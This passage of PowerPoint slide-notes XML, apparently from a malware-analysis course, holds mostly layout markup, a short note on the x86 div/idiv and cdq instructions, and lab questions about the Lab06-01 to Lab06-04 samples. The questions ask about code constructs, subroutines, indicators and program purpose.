      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="760"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761"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1FE07E66-FC0C-4BF3-8D8B-3758204734DB}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="841"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842"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54C8718C-410F-495C-A3F2-E9A97B41C3CF}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="844" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486040" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>When performing the div or idiv instruction, you are dividing edx:eax by the operand</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and storing the result in eax and the remainder in edx.</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Cdq =&gt; edx:eax</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="845"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D85DEE53-2726-4AD4-8A04-12510FCF6EE9}"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6" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="847"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848"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4CFA8683-25E6-4FC5-9955-E3B8E3148562}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="850"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851"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7A3496EC-DA25-49BB-8261-A931D8FAD204}"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2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="853"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854"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043E93CD-1D83-4EBC-8A88-D121E468EE86}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="856"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857"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F4B30AC7-31D4-4F1C-B826-A12DF418E4CD}"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8" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="859" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486040" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Lab06-01.exe</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>What is the major code construct found in </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>()?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>What is the subroutine located at 0x40105F?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>What is the purpose of the program?</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Lab06-02.exe</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>What does 1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" baseline="30000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> subroutine called by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>() do?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>What is the subroutine located at 0x40117F?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>What does 2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" baseline="30000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> subroutine called by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>() do?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>What is network-based indicators?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>What the purpose of the program?</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Lab06-03.exe</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>What is the function called by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>()? parameters used? Code construct? purpose</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>What are host-based indicators?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>What is the purpose of the program</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Lab06-04.exe</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>What is different called by main() compared to Lab06-03? New code construct added to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>()?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>How long will this program run?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>What are network-based indicators?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>What is the purpose of the program?</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860" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{2B2D3985-29E0-46B8-B2B7-3A881A82D898}" type="slidenum">
              <a:rPr b="0" lang="en-GB" sz="1400" spc="-1" strike="noStrike">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US"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0" y="0"/>
            <a:ext cx="9143640" cy="112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 name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="3867120"/>
            <a:ext cx="8784720" cy="2438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0" y="0"/>
            <a:ext cx="9143640" cy="112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0" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="4286880" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681080" y="1196640"/>
            <a:ext cx="4286880" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="3867120"/>
            <a:ext cx="4286880" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681080" y="3867120"/>
            <a:ext cx="4286880" cy="2438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0" y="0"/>
            <a:ext cx="9143640" cy="112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5" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="2828520" cy="243828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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3150000" y="1196640"/>
            <a:ext cx="2828520" cy="243828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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6120360" y="1196640"/>
            <a:ext cx="2828520" cy="243828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5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="3867120"/>
            <a:ext cx="2828520" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3150000" y="3867120"/>
            <a:ext cx="2828520" cy="2438280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
